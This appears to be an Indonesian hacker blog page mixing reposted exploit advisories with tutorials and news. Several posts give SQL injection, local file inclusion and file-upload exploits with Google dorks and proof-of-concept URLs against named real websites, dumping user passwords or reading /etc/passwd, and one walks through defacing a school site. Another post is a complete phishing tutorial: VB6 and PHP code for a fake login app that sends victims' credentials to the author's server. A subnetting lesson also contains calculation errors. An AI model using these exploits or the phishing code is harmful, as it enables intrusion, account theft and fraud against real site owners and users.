mydisha
v1.1
today : | at : | safemode : ON
> / mydisha / facebook / twitter / hacker-newbie.org /
name author perms com modified label

WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability Inveet.id rwxr-xr-x 0 21.36

Filename WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 21.36
Label
Action
# Exploit Title: WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability 

# Google Dork: inurl:"wp-content/plugins/sendit/submit.php" 

# Date: 2011-08-25 

# Author: evilsocket ( evilsocket [at] gmail [dot] com ) 

# Software Link: http://wordpress.org/extend/plugins/sendit/ 

# Version: 1.5.9 (tested with magic quotes OFF)  

 
---------------
Vulnerable code
---------------
 
[ submit.php line 27 ]
 
$user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where email ='$_POST[email_add]' and id_lista = '$_POST[lista]';");
 
 
As you can see, $_POST[lista] parameter is nor validated neither escaped, so you can blind sql inject it using $user_count for the
boolean condition checking :
 
 
[ submit.php line 29 ]
 
if($user_count>0) :
  $errore_presente = "<div class=\"error\">".__('email address already present', 'sendit')."</div>";
  die($errore_presente);
 
---
[-] PoC
---
 
[-] POST:
 
email_add = some.random.regexp.valid.email@domain.ltd
lista = BLIND SQL INJECTION HERE
 
TO:
 
http://www.site.com/wp-content/plugins/sendit/submit.php

Fakta dibalik Keamanan Linux Inveet.id rwxr-xr-x 0 05.14

Filename Fakta dibalik Keamanan Linux
Permission rw-r--r--
Author Inveet.id
Date and Time 05.14
Label
Action
Anda semua pasti tahu apa itu Linux bukan? Dengan pengguna sebanyak 44% dari seluruh dunia, sampai saat ini, sistem keamanan Linux memang jauh lebih baik dibandingkan dengan Windows. Itu juga alasan kenapa beberapa user memakai Linux. Linux sudah sangat aman sejak pertama kali di instal. Jadi, sebenarnya kita tidak perlu takut harus melakukan settingan tambahan. Tapi sebagai pengguna, baik itu pengguna biasa, pengembang software ataupun administrator, lebih baiknya jika kita mengetahui fakta-fakta penting berikut:

1. Linux lebih aman dari Windows karena di Linux lebih sedikit exploits dalam celah keamanan, “lebih sedikit bukan berarti tidak ada”. Biasanya hal ini yang sering disepelekan oleh pengguna baru dan juga admin junior. Perbedaannya adalah dimana letak kelemahannya, bagaimana cara masuknya dan jenis serangannya. Itu yang harus anda ketahui. Misalnya, pengguna desktop masih rentan dengan serangan berbasis browser-exploits.

Intinya adalah menyadari bahwa Linux adalah sistem operasi yang juga mempunyai kerentanan terhadap serangan dan sebagai pengguna sebaiknya mengetahui dengan betul hal tersebut.

2Jika anda pengguna baru Linux yang baru saja beralih dari Windows, mungkin anda berfikir Anti-Virus apa yang bagus untuk Linux. Tenang, anda tidak memerlukan Anti-Virus. Ini mungkin agak bertentangan dengan point sebelumnya, tapi maksud sebenarnya adalah Linux tidak mempunyai masalah dengan virus yang biasa menyerang sistem operasi Windows. Jika anda ingin menginstal antivirus di Linux, saya sarankan anda memakai ClamAV.


3Lebih baik jika kita mau meluangkan sedikit waktu untuk mengetahui berita tentang sekuriti yang berkaitan dengan sistem operasi anda. Di Linux, sebaiknya kita selalu melakukan update sistem secepatnya setelah update tersebut tersedia. Dengan begitu segala celah keamanan dan kesalahan sistem secara otomatis telah diperbaiki atau/dan diperbarui. Sangat direkomendasikan mengecek update sehari sekali atau bahkan perjam, tentu saja anda tidak perlu melakukannya secara manual. Anda tinggal mengatur di System > Preferences > Software Updates. Mudah bukan!!??  :D


4Di Linux seorang pengguna biasa tidak mempunyai kewenangan untuk merubah konfigurasi sistem. Pastikan anda telah mengatur hak tiap pengguna sesuai dengan kubutuhan masing-masing dan usahakan tidak login sebagai root untuk menghindari hal-hal yang tidak diinginkan, baik itu sengaja ataupun tidak sengaja. Di Fedora, secara default SELinux sudah terinstal dan bisa membatasi hak-hak software yang berjalan.
Jika dianggap perlu kita bisa meng-enkripsi data-data penting yang sekiranya
orang lain tidak bisa meng-akses file-file tersebut tanpa sepengatahuan anda.

5Jika anda seorang admin server, usahakan untuk menginstal “chkrootkit” untuk memastikan bahwa sistem anda tidak diambil alih orang lain. Gunakan juga “Tripwire” dan “Snort” untuk mendetaksi adanya penyusup.
Dan tidak ada salahnya jika selalu mem-backup data ataupun sistem kita. Untuk mengantisipasi hilang data ataupun hal buruk lainnya. :)


Sumber : Axoncode

webdesQ sql injection vulnerability Inveet.id rwxr-xr-x 0 23.49

Filename webdesQ sql injection vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 23.49
Label
Action
#Exploit Title: webdesQ sql injection vulnerability
#Date:02/07/2011
#Author:XaDaL
#Software Link: http://www.webdesq.nl/
#Tested on: windows xp
#google dork: inurl: “powered by webdesQ”

#########################################################
 
[-] EXPLOIT

http://[localhost]/index.php?id=26&news_id=[SQLI]
http://[localhost]/index.php?id=26&news=[SQLI]

[-]EXAMPLE

http://[localhost]/index.php?id=62&news_id=2127 union select
1,2,3,4,5,6,7–

http://[localhost]/index.php?id=24&news=166 union select
1,version(),3,4,5,6,7–

##########################################################
Thank’s to: xr0b0t
,kaMtiez,1bliez,jundab,boebefa,ulow,ryanaby,kampret0,hmei7
#virgi,hakz,dr.CruZz,geni212,red robot ,a17z,rj-45,anharku,jos_ali_joe
#arianom,tukulesto,cimpli,contrex,t3ll0,
#all members magelangcyber team,indonesiancoder and indonesian hacker

Joomla Component XOBBIX [prodid] SQL Injection Vulnerability Inveet.id rwxr-xr-x 0 23.41

Filename Joomla Component XOBBIX [prodid] SQL Injection Vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 23.41
Label
Action

[-] Joomla Component XOBBIX [prodid] SQL Injection Vulnerability
Software : com_xobbix version 1.0.x
Vendor : http://www.php-shop-system.com/
Author : AntiSecurity
Home : http://antisecurity.org/


[-] Exploit

 
http://localhost/[path]/index.php?option=com_xobbix&catid=32&task=prod_desc&prodid=25


[-] PoC

 
http://stutterandsing.com/index.php?option=com_xobbix&catid=31&task=prod_desc&prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,database(),10,11,12,13,14,15,16+from+jos_users--


[-] Dork

 
inrul:"com_xobbix"

MyNews Arbitrary File Upload Vulnerability Inveet.id rwxr-xr-x 2 23.38

Filename MyNews Arbitrary File Upload Vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 23.38
Label
Action
[-] MyNews Arbitrary File Upload Vulnerability

Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"


[-] Exploit

FCKeditor/editor/filemanager/upload/php/config.php

// SECURITY: You must explicitelly enable this "uploader".

$Config['Enabled'] = true ;

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"

http://localhost/[path]/files/your_file.txt


[-] PoC

http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html


http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html

JoomTouch Joomla Component Local File Inclusion Vulnerability Inveet.id rwxr-xr-x 0 22.50

Filename JoomTouch Joomla Component Local File Inclusion Vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 22.50
Label
Action
[-] JoomTouch Joomla Component <= Local File Inclusion Vulnerability

Software : com_joomtouch ver 1.0.2
Vendor : http://www.joomtouch.com/
Dork : "com_joomtouch"
Author : mydisha


[-] Exploit

http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]


[-] PoC

http://torah5.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00 

http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

D-Forum 1.11 SQL Injection Vulnerability Inveet.id rwxr-xr-x 0 22.47

Filename D-Forum 1.11 SQL Injection Vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 22.47
Label
Action
 [-] D-Forum 1.11 SQL Injection Vulnerability

Software : D-Forum version 1.11 [previous version affected too]
Vendor : http://www.adalis.fr/dforum
Author : NoGe

[-] Exploit

http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]


[-] Dork

"Powered by D-forum"
"nav.php3?page=voirsujet"


[-] PoC

http://www.enesm.com/forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--

http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--

CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Inveet.id rwxr-xr-x 1 03.50

Filename CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads
Permission rw-r--r--
Author Inveet.id
Date and Time 03.50
Label
Action
[-] CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads


[-] Exploit :


http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html

[-]Dork : 


inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

Pertama , Kita Cari Target digoogle dengan memasukan dork diatas .

tersera kalian mau coba dork yg mana .

kemudian pilih salah satu site dari google tadi :


Example : http://www.smkmuh7gdl-malang.sch.id

Langkah selanjutnya , kita masukan Exploit di Target Tersebut :


Example : http://www.smkmuh7gdl-malang.sch.id/editor/filemanager/connectors/test.html

sekarang , setelah masuk
Ganti Connector ASP → PHP

Lalu , Upload File txt kamu ,
oh iya , file HTML gak bisa lo , hanya file TXT yang bisa Warning

setelah upload , dimana tempatnya file kita tadi ? BingungBingung
itu mudah , langsung saja masukan


http://public_html/userfiles/file/file-deface.txt

http://public_html/userfiles/file-deface.txt 

dan ini hasil saya tadi


http://www.smkmuh7gdl-malang.sch.id/userfiles/file/test.txt

sekian copasan saya , silakan berexplorasi sendiri ya Perimaho



Thanks : Oka1302

[VB6] Membuat Gradient Warna Pada Form Inveet.id rwxr-xr-x 0 03.21

Filename [VB6] Membuat Gradient Warna Pada Form
Permission rw-r--r--
Author Inveet.id
Date and Time 03.21
Label
Action
nih gan ane mau share source code untuk membuat gradient pada form di vb 6

Gradient menurut ane itu adalah mencampurkan warna ... contoh nya kayak antivirus smadav yang pake gradient campuran warna hijau dan putih.

langsung aja kita masuk dan bahas code nya Bigsmile

===========================
Membuat Gradient Form Vb6
===========================

Buatlah sebuah project baru,lalu tambahkan 1 buah module
module nya di beri nama modGradient


Code:
Option Explicit

Declare Function GetSysColor Lib "user32" ( _
ByVal nIndex As Long) As Long

Sub CatForm(Obj As Object, Jenis As Integer, _
Color1 As Long, Color2 As Long)
    Dim Y!, X!
  
    Dim sngMerah!, sngHijau!, sngBiru As Single
    Dim Merah%, Hijau%, Biru%
    Dim Merah2%, Hijau2%, Biru2 As Integer
  
    Dim Temp As Long
  
    Obj.AutoRedraw = True

    Temp = (Color1 And 255)
    Merah = Temp And 255
      
    Temp = Int(Color1 / 256)
    Hijau = Temp And 255
      
    Temp = Int(Color1 / 65536)
    Biru = Temp And 255
      
    Temp = (Color2 And 255)
    Merah2 = Temp And 255
      
    Temp = Int(Color2 / 256)
    Hijau2 = Temp And 255
      
    Temp = Int(Color2 / 65536)
    Biru2 = Temp And 255
      
    If Jenis = 1 Then
        sngMerah = Abs(Merah - Merah2) / Obj.ScaleHeight
        sngHijau = Abs(Hijau - Hijau2) / Obj.ScaleHeight
        sngBiru = Abs(Biru - Biru2) / Obj.ScaleHeight
    Else
        sngMerah = Abs(Merah - Merah2) / (Obj.ScaleWidth)
        sngHijau = Abs(Hijau - Hijau2) / (Obj.ScaleWidth)
        sngBiru = Abs(Biru - Biru2) / (Obj.ScaleWidth)
    End If
      
    If Merah2 < Merah Then sngMerah = -sngMerah
    If Hijau2 < Hijau Then sngHijau = -sngHijau
    If Biru2 < Biru Then sngBiru = -sngBiru
      
    'Mulai mengcat form
    If Jenis = 1 Then
  
            'Arah gradient vertikal
        For Y = 0 To Obj.ScaleHeight
            Merah2 = Merah + sngMerah * Y
            Hijau2 = Hijau + sngHijau * Y
            Biru2 = Biru + sngBiru * Y
            Obj.Line (0, Y)-(Obj.Width, Y), _
            RGB(Merah2, Hijau2, Biru2)
        Next Y
    Else
            'Arah Gradient Horisontal
        For X = 0 To Obj.ScaleWidth
            Merah2 = Merah + sngMerah * X
            Hijau2 = Hijau + sngHijau * X
            Biru2 = Biru + sngBiru * X
            Obj.Line (X, 0)-(X, Obj.Height), _
            RGB(Merah2, Hijau2, Biru2)
        Next X
    End If
End Sub

lalu untuk menggunakan nya dapat menggunakan fungsi di bawah ini

Code:
CatForm Me, 0, &HC0C0C0, &H808080

*NB : code di atas berfungsi untuk mewarnai form secara Horizontal
dan mengambil warnanya berdasarkan nilai Hexa

Horizontal = 0
Vertical = 1


agar form dapat di buat gradient saat program di jalankan dapat menggunakan code di bawah ini

Code:
Private Sub Form_Load()
    CatForm Me, 0, &HC0C0C0, &H808080
End Sub

semoga berguna Bigsmile

[VB 6] Membuat Phising Aplication Inveet.id rwxr-xr-x 1 03.07

Filename [VB 6] Membuat Phising Aplication
Permission rw-r--r--
Author Inveet.id
Date and Time 03.07
Label
Action
sekarang ane mau ngasih tutorial tentang Phising aplication menggunakan bahasa pemrograman VB ... Brucelee

mungkin agan" sekalian udah tau kan apa itu phising ?
kali ini teknik phising nya kita terapin pada sebuah program desktop Sinis
(biasanya kan phising lewat situs")


sebelumnya baca dulu nih gan sebagai contoh nya :

ada sebuah program kita sebut saja cheat poker facebook
program itu akan menyuruh anda untuk login ke facebook menggunakan program tersebut,apabila ingin membuat cheatnya bekerja.
user yang tertipu akan login lewat program tersebut
di dalam program tersebut terdapat 2 buah textbox dan 1 buah command button.

2 textbox itu adalah penampung Email & Password yang akan di kirim ke server kita dan command buttonnya di gunakan untuk meng eksekusi code,setelah code di eksekusi program akan memanggil sebuah file .php yang telah di buat sebelumnya di server kita
file php yang telah di panggil tersebut bertindak mencatat ip korban pengirim,mencacat tanggal pemanggilan file php,dan mencatat Email & Password korban yang telah di masukan di 2 buah textbox yang ada di program tersebut lalu menyimpannya dalam sebuah file text.

Ngerti kan gan dengan cara kerja program ini ? Bahagia

langsung aja yuk kita praktekin.


Bahan" yang harus agan punya untuk membuat project ini bekerja dengan lancar :

1 buah web hosting untuk menampung file php dan file text hasil dari phising kita
* Program VB6 (Kalo bisa sih yang full version gan)
* Siapin susu juga gan jikalau agan haus wakaka

1. Buka webhosting agan,lalu buat 1 buah file dengan nama mydisha.php
lalu isikan dengan code ini

<?php
$datum
=date('d-m-Y / h:i:s a');$email $_GET[e];$password $_GET[p];$ip getenv ('REMOTE_ADDR');$fl fopen('Ihiy.txt''a');fwrite($fl"IP Address : $ip\nDate : $datum\nUsername : $email\nPassword : $password\n\n");fclose($fl); $ref $_SERVER['HTTP_REFERER'];header("location: $ref");?>
 
 trus di save gan,

sekarang kita buka Microsoft Visual Basic 6.0

----------------------------------------
Author : mydisha
Facebook : http://www.facebook.com/mydisha
Compiller : Microsoft Visual Basic 6.0
Program Tipe : Fake Aplication
----------------------------------------


buat 1 buah project baru lalu buat ini :


* Buat 1 Form dengan nama frmUtama
* buat 1 Module dengan nama modConnect

isi code ini kedalam module (modConnect)

Code:
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef _
lpSFlags As Long, ByVal dwReserved As Long) As Long
Const INTERNET_CONNECTION_MODEM = 1
Const INTERNET_CONNECTION_LAN = 2
Const INTERNET_CONNECTION_PROXY = 4
Const INTERNET_CONNECTION_MODEM_BUSY = 8

'Fungsi yang berguna untuk mengecek koneksi internet yang ada di komputer kita menggunakan fungsi api InternetGetConnectedState
Function CekInternet(Optional connectMode As Integer) As Boolean
Dim flags As Long
CekInternet = InternetGetConnectedState(flags, 0)
connectMode = flags
End Function

lalu di frmUtama tambahkan 2 buah text box dan 1 buah command button 1 buah label

Textbox pertama di namakan : txtUname
Textbox Kedua di namakan : txtPass

Command button dinamakan : cmdLogin

Label dinamakan : lblInfo


Copykan kode ini kedalam form

Code:
Private Sub Form_Load()
lblInfo.Caption = "Memeriksa Koneksi Internet"
If CekInternet = False Then
lblInfo.Caption = "Komputer Anda Tidak Terkoneksi Ke Internet !"
Else
lblInfo.Caption = "Komputer Anda Terkoneksi Dengan Internet"
Me.Caption = "mydisha Ganteng :p"
End If
End Sub

lalu masukan code ini kedalam cmdLogin

Code:
Dim user, pass As String
Dim IE As Object
user = LCase(txtUname.Text)
pass = txtPass.Text

If txtUname.Text = "" Then
MsgBox "Kotak Teks masih kosong,silahkan isikan dengan benar !", vbExclamation, "Error"
Else
lblInfo.Caption = "Sedang Login ..."
Set IE = CreateObject("InternetExplorer.Application")

IE.Visible = 0
IE.Navigate "http://www.domainkamu.com/mydisha.php?e=" & _
  user & "&p=" & pass

Do While IE.Busy
Sleep 200 'sleepnya 200 ajah :p

Loop
IE.Quit
Set IE = Nothing

lblInfo.Caption = "Username/Password Salah !"
MsgBox "Username/Password Salah !", vbExclamation, "Error"
End If

sampai kapanpun kotak pesan yang memberitahukan kita salah memasukan password/username akan selalu muncul bila command button di klik wakaka

bila sudah compile project kamu,lalu lakukan percobaan

bila ingin melihat hasil lognya agan dapat mengakses
http://www.domainkamu.com/Ihiy.txt

kalo trik ini ane gunakan untuk mencuri ID K*sk*s gan Sinis
program ini bisa agan pake untuk apa aja,untuk nyuri akun fb,paypal,dll
tergantung kreativitas agan aja dalam design programnya agar usernya tertarik & percaya kalau program ini aman wakaka

Rencana Anonymous "Membunuh" Facebook Inveet.id rwxr-xr-x 0 02.37

Filename Rencana Anonymous "Membunuh" Facebook
Permission rw-r--r--
Author Inveet.id
Date and Time 02.37
Label
Action
VIVAnews - Kelompok hacker Anonymous mengumumkan rencana mereka untuk 'membunuh' sosial media Facebook. Hal ini akan mereka lakukan karena Facebook dianggap telah menyalahgunakan identitas pribadi para penggunanya.

"Media komunikasi yang sangat kalian sayangi dan puja ini akan segera dihancurkan," ujar seorang yang mengaku anggota Anonymous di Youtube, dikutip dari CNN, Selasa, 9 Agustus 2011.

Tokoh yang wajah serta suaranya disamarkan ini mengaku wakil dari Anonymous. Dia mengajak para pengguna Facebook turut serta dalam upaya menghancurkan sosial media tersebut, demi keselamatan identitas pribadi mereka.

"Apapun yang kau masukkan di Facebook, tetap ada di Facebook. Menghapus akunmu juga tidak mungkin dilakukan. Jikapun kau dapat menghapusnya, semua informasi dirimu masih ada di Facebook dan dapat dimunculkan kapan saja," kata dia.

Dalam video tersebut, wakil Anonymous juga mengatakan bahwa Facebook telah menjual informasi identitas penggunanya kepada para agen pemerintah untuk dimata-matai. Rencananya, operasi ini akan dilakukan pada 5 November mendatang, bertepatan dengan hari Guy Fawkes. Hari itu, pada tahun 1605 terjadi upaya pembunuhan raja Inggris oleh Fawkes.

Juru Bicara Facebook menolak mengomentari rencana Anonymous tersebut. Namun, Facebook sebelumnya telah berulangkali mengatakan tidak menyebarkan identitas penggunanya ke pihak ketiga tanpa adanya persetujuan dari pengguna. "Kami tidak memberikan informasi pribadi pengguna kepada orang-orang atau badan lain. Kami tidak akan dan tidak akan pernah melakukan hal itu," kata pendiri Facebook, Mark Zuckerberg, tahun lalu.

Namun, tidak semua anggota Anonymous menyetujui penyerangan terhadap Facebook ini. Perlu diketahui, Anonymous adalah organisasi peretas yang tidak jelas struktur kepemimpinan dan pengurusnya. Organisasi ini juga tidak memiliki ikatan dan aturan yang jelas dan memungkinkan para anggotanya melakukan tindakan secara independen.

"FYI - #opFacebook hanya dilakukan oleh sebagian Anons. Hal ini menunjukkan tidak semua #Anonymous menyetujuinya," tulis kelompok ini dalam akun Twitternya, @GroupAnon.

• VIVAnews

Pengertian Subnetting , Netmask , Network Id , Default Gateway , Dan Broadcast Inveet.id rwxr-xr-x 0 02.08

Filename Pengertian Subnetting , Netmask , Network Id , Default Gateway , Dan Broadcast
Permission rw-r--r--
Author Inveet.id
Date and Time 02.08
Label
Action
Subnetting

Kita juga harus menguasai konsep subnetting untuk mendapatkan IP address baru, dimana dengan cara ini kita dapat membuat network ID baru dari suatu network yang kita miliki sebelumnya. Subnetting digunakan untuk memecah satu buah network menjadi beberapa network kecil.
Untuk memperbanyak network ID dari suatu network id yang sudah ada, dimana sebagaian host ID dikorbankan untuk digunakan dalam membuat ID tambahan
Ingat rumus untuk mencari banyak subnet adalah 2 n – 2
N = jumlah bit yang diselubungi
Dan rumus untuk mencari jumlah host per subnet adalah 2 m – 2
M = jumlah bit yang belum diselubungi
Contoh kasus dengan penyelesaian I :
Ip address 130.200.0.0 dengan subnet mask 255.255.224.0 yang diidentifikasi sebagai kelas B.
Subnet mask : 11111111.11111111.11100000.00000000
3 bit dari octet ke 3 telah digunakan , tingal 5 bit yang belum diselubungi maka banyak kelompok subnet yang bisa dipakai adalah kelipatan 2 5 = 32 (256 – 224 = 32)
32 64 96 128 160 192 224
Jadi Kelompok IP yang bisa digunakan dalah ;
130.200.0.0 – 130.200.31.254  subnet loopback
130.200.32.1 – 130.200.63.254
130.200.64.1 – 130.200.95.254
130.200.96.1 – 130.200.127.254
130.200.128.1 – 130.200.159.254
130.200.160.1 – 130.200.191.254
130.200.192.1 – 130.200.223.254
Contoh kasus dengan penyelesaian II :
Terdapat network id 130.200.0.0 dengan subnet 255.255.192.0 yang termasuk juga kelas B, cara lain untuk menyelesaikannya adalah ;
• Dari nilai octet pertama dan subnet yang diberikan, dapat diketahui IP address adalah kelas B yang octet ketiga diselubungi dengan angka 192…
• Hitung dengan rumus (4 oktet – angka yang diselubung) 256 – 192 = 64
• Jadi kelompok subnet yang dapat dipakai adalah kelipatan 64 dan 128.
Jadi kelompok ip yang dapat dipakai adalah
130.200.64.1 sampai 130.200.127.254
130.200.128.1 sampai 130.200.199.254
Kasus ;
Kita memiliki kelas B dengan network ID 130.200.0.0 dengan subnet mask 255.255.224.0
Dengan cara yang sama diatas sebelumnya ;
• Dari nilai octet pertama dan subnet yang diberikan dapat diketahui IP address adalah kelas B dengan octet ketiga terseluibung dengan angka 224
• Hitung dengan rumus (256-224) =32
• Jadi kelompok subnet yang dapat dipakai adalah kelipatan 32 yaitu 64 96 128 160 192
Dengan demikian, kelompok IP address yang dapat dipakai adalah ;
130.200.32.1 sampai 130.200.63.254
130.200.64.1 sampai 130.200.95.254
130.200.96.1 sampai 130.200.127.254
130.200.128.1 sampai 130.200.159.254
130.200.160.1 sampai 130.200.191.254
130.200.192.1 sampai 130.200.223.254
Kasus :
misalkan kita menggunakan kelas C dengan network address 192.168.81.0 dengan subnet mask 255.255.255.240, maka
• Dari nilai octet pertama dan subnet yang diberikan dapat diketahui IP address adalah kelas C dengan oktat ketiga terselubung dengan angka 240
• Hitung (256 – 240) = 16
• Maka kelompok subnet yang dapat digunakan adalah kelipatan 16, yaitu 16 32 48 64 80 96 112 128 144 160 176 192 208 224
Maka kelompok IP address yang dapat digunakan adalah ;
192.168.81.17 sampai 192.168.81.20
192.168.81.33 sampai 192.168.81.46
192.168.81.49 sampai 192.168.81.62
192.168.81.65 sampai 192.168.81.78
192.168.81.81 sampai 192.168.81.94
192.168.81.97 sampai 192.168.81.110
192.168.81.113 sampai 192.168.81.126
192.168.81.129 sampai 192.168.81.142
192.168.81.145 sampai 192.168.81.158
192.168.81.161 sampai 192.168.81.174
192.168.81.177 sampai 192.168.81.190
192.168.81.193 sampai 192.168.81.206
192.168.81.209 sampai 192.168.81.222
192.168.81.225 sampai 192.168.81.238
Kasus :
Sebuah perusahaan yang baru berkembang mempunyai banyak kantor cabang dan tiap kantor cabang mempunyai 255 workstation, network address yang tersedia adalah 164.10.0.0, buatlah subnet dengan jumlah subnet yang terbanyak
Penyelesaian ; 164.10.0.0 berada pada kelas B, berarti octet 3 dan 4 digunakan untuk host, sedangkan 1 kantor cabang ada 254 host, maka ambil 1 bit lagi dari octet ke 3 agar cukup.
Maka subnetmask yang baru
11111111.11111111.11111110.00000000
255. 255. 254. 0
Subnet yang tersedia adalah 256 – 254 = 2, maka subnetnya kelipatan 2 sampai dengan 254.
Jumlah subnet (2 7 – 2) = 128 – 2 = 26 subnet
Jumlah host / subnetnya (2 9 – 2 ) = 512 – 2 = 510 host
164.10.0.0 sampai 164.10.1.0  dibuang
164.10.2 .1 sampai 164.10.3.254
164.10.4.1 sampai 164.10.5.254
164.10.6.1 sampai 164.10.7.254
164.10.8.1 sampai 164.10.9.254
.
.
.
164.10.252.1 sampai 164.10.253.254
Kasus :
Kita mendapatkan IP dari ISP yaitu 192.168.20.0 untuk alamat network dan subnet masknya 255.255.255.192 ini berarti notasi /26.
Jumlah subnet adalah 192, berarti 11000000, maka 22 – 2 = 2
Berapa banyak host per subnet, 26 – 2 = 62 host
Hitung subnet yang valid 256 – 192 = 64 subnet, maka terus tambahkan block size sampai angka subnet mask. 64 + 64 = 128. 128 + 64 = 192, yang tidak valid karena ia adalah sebuah subnet mask. Maka subnet yang valid adalah 64 dan 128.
Subnet 64 128
Host pertama 65 129
Host terakhir 126 190
Alamat Broadcast 127 191
Cara membaca tabel diatas yaitu dari atas ke bawah untuk setiap kolom subnet, contoh: kolom pertama subnet 64 atau lengkapnya 192.168.20.64 memunyai host pertama 65 atau 192.168.20.65, host terakhir 126 atau 192.168.20.126 dan alamat broadcast di 127 atau 192.168.20.127.
Kasus
Kita mendapatkan IP dari ISP yaitu 192.168.10.0 untuk alamat network dan subnet masknya 255.255.255.224 ini berarti notasi /27.
Berapa jumlah subnet, 224 adalah 11100000, jadi 23-3 = 6
Berapa banyak host per subnet, 25 – 2 = 30 host
Hitung subnet yang valid 256 – 224 = 32
32 + 32 = 64
64 + 32 = 96
96 + 32 = 128
128 + 32 = 160
160 + 32 = 192
192 + 32 = 224
224 tidak valid karena ia adalah sebuah subnet mask. Maka subnet yang valid adalah
32, 64, 96,128,160,129,224
Subnet 32 64 96 128 160 192
Host pertama 33 65 97 129 161 193
Host terakhir 62 94 126 158 190 222
Alamat Broadcast 63 95 127 159 191 223
Cara membaca tabel diatas yaitu dari atas ke bawah untuk setiap kolom subnet, contoh: kolom pertama subnet 32 atau lengkapnya 192.168.10.32 memunyai host pertama 33 atau 192.168.10.33, host terakhir 62 atau 192.168.10.62 dan alamat broadcast di 63 atau 192.168.10.63.
Kasus kelas C
Kita mendapatkan IP dari ISP yaitu 192.168.10.0 untuk alamat network dan subnet masknya 255.255.255.224 ini berarti notasi /27.
Berapa jumlah subnet, 224 adalah 11100000, jadi 23-3 = 6
Berapa banyak host per subnet, 25 – 2 = 30 host
Hitung subnet yang valid 256 – 224 = 32
32 + 32 = 64
64 + 32 = 96
96 + 32 = 128
128 + 32 = 160
160 + 32 = 192
192 + 32 = 224
224 tidak valid karena ia adalah sebuah subnet mask. Maka subnet yang valid adalah
32, 64, 96,128,160,129,224
Subnet 32 64 96 128 160 192
Host pertama 33 65 97 129 161 193
Host terakhir 62 94 126 158 190 222
Alamat Broadcast 63 95 127 159 191 223
Cara membaca tabel diatas yaitu dari atas ke bawah untuk setiap kolom subnet, contoh: kolom pertama subnet 32 atau lengkapnya 192.168.10.32 memunyai host pertama 33 atau 192.168.10.33, host terakhir 62 atau 192.168.10.62 dan alamat broadcast di 63 atau 192.168.10.63.
Kasus :
Di sebuah perusahaan manufacturing yang mempunyai banyak bagian dalam perusahaan tersebut, dimana setiap bagian mempunyai 700 host, network address yang didapat adalah 171.168.10.0, berarti ini kelas B…perhatikan bagaimana jika kita menggunakan kelas C karena kelas C hanya dapat menampung host sebanyak 254 !!!
Classless Inter-Domain Rouitng (CIDR)
Suatu metode yang digunakan oleh ISP untuk mengalokasikan sejumlah alamat pada perusahaan, kerumah seorang pelanggan. ISP menyediakan ukuran blok (block size) tertentu.
Contoh : kita mendapatkan blok IP 192.168.32/28. notasi garis miring atau slash notation (/) berarti berapa bit yang bernilai 1 (contoh diatas adalah /28 berarti ada 28 bit yang bernilai 1).
Nilai maksimum setelah garing adala /32. karena satu byte adalah 8 bit dan terdapat 4 byte dalam sebuah alamat IP (4 x 8 = 32). Namun subnet mask terbesar tanpa melihar class alamatnya adalah hanya /30, karena harus menyimpan paling tidak dua buah bit sebagai bit dan host.
Nilai CIDR
255.0.0.0 /8
255.128.0.0 /9
255.192.0.0 /10
255.224.0.0 /11
255.240.0.0 /12
255.248.0.0 /13
255.252.0.0 /14
255.254.0.0 /15
255.255.0.0 /16
255.255.128.0 /17
255.255.192.0 /18
255. 255.224.0 /19
255. 255.240.0 /20
255. 255.248.0 /21
255. 255.252.0 /22
255. 255.254.0 /23
255. 255.255.0 /24
255.255. 255.128 /25
255.255. 255.192 /26
255. 255. 255.224 /27
255. 255. 255.240 /28
255. 255. 255.248 /29
255. 255. 255.252 /30
Keterangan : pola yang dimaksudkan adalah pola 128, 192, 224, 240, 248, 252, dan 254
Dimana 128 dalam binary yaitu = 10000000 (1 bit subnet), 192 dalam binary yaitu 11000000 (2 bit binary) dan seterusnya. Maka hafalkan pola 128, 192, 224, 240, 248, 252 dan 254.
Contoh latihan subnetting : alamat class B
Alamat Network 172.16.0.0 dan subnet mask 255.255.192.0
Subnet 192 = 11000000, 2 2 – 2 = 2
Host 2 14 – 2 = 16.382 (6 bit di octet ketiga, dan 8 bit di octet keempat)
Subnet yang valid 256 – 192 = 64. 64 + 64 = 128
Subnet 64.0 128.0
Host pertama 64.1 128.1
Host terakhir 127.254 192.254
Broadcast 127.255 199.255
